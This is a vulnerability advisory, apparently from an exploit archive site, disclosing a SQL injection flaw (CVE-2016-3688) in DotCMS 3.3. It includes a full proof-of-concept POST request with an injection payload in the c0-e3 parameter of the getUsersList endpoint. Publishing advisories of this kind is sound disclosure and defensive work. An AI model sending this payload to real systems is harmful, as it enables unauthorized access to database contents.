what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

DotCMS 3.3 SQL Injection

DotCMS 3.3 SQL Injection
Posted Apr 5, 2016
Authored by Piaox Xiong

DotCMS version 3.3 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
advisories | CVE-2016-3688
SHA-256 | faa63524a8d16e4af5a5bf5641da111cadd20a585bd8aee91ab2604c4c1d63e8

DotCMS 3.3 SQL Injection

Change Mirror Download
1¡¢Description

Exploit Title: SQL Injection Vulnerability in DotCms v3.3

Date: 3-28-2016

Vendor Homepage: http://dotcms.com/

Vendor: dotcms

Software: Content Management System

Version: v3.3

CVE:CVE-2016-3688





2¡¢Product Summary

================

dotcms is a fully featured open source enterprise grade J2EE/Java based web content management system for building/managing websites, content and content driven web applications. it¡¯s specially designed for bridges the gap between PHP CMS and J2EE document management solutions. it include features such as support for virtual hosting, WebDav (beta), structured content, clustering and can run on multiple databases PostgreSQL, MySQL, MSSQL and Oracle. It also includes standard WCMS features like page caching, templating, and a API.



3¡¢Vulnerabilities

================

A SQL injection vulnerability has been identified in dotCMS 3.3 which, if successfully exploited, could allow an attacker to access sensitive information in the dotcms database.

Demo:(http://dotcms.com/content-management-system/cms-demo)



The vulnerability is due to the dwr/call/plaincall/UserAjax.getUsersList.dwr ,¡°c0-e3¡±parameter



Proof of concept

================

POST /dwr/call/plaincall/UserAjax.getUsersList.dwr

callCount=1

windowName=c0-param2

c0-scriptName=UserAjax

c0-methodName=getUsersList

c0-id=0

c0-param0=null:null

c0-param1=null:null

c0-e1=number:0

c0-e2=number:50

c0-e3=string:%25'%20and%201%3D1%20and%20'%25'%3D'

c0-param2=Object_Object:{start:reference:c0-e1, limit:reference:c0-e2, query:reference:c0-e3}

batchId=4

instanceId=0

page=%2Fc%2Fportal%2Flayout%3Fp_l_id%3Da8e430e3-8010-40cf-ade1-5978e61241a8%26p_p_id%3DEXT_USER_ADMIN%26p_p_action%3D0%26%26dm_rlout%3D1%26r%3D1459154302419

scriptSessionId=jnMOli*Civ5bu2PIg2Z1YaOlYel/10irYel-hmv1Q$Yud






4¡¢Discovered by

================
piaox xiong ¨C xiongyaofu351@pingan.com.cn
Login or Register to add favorites

File Archive:

December 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    2 Files
  • 2
    Dec 2nd
    0 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close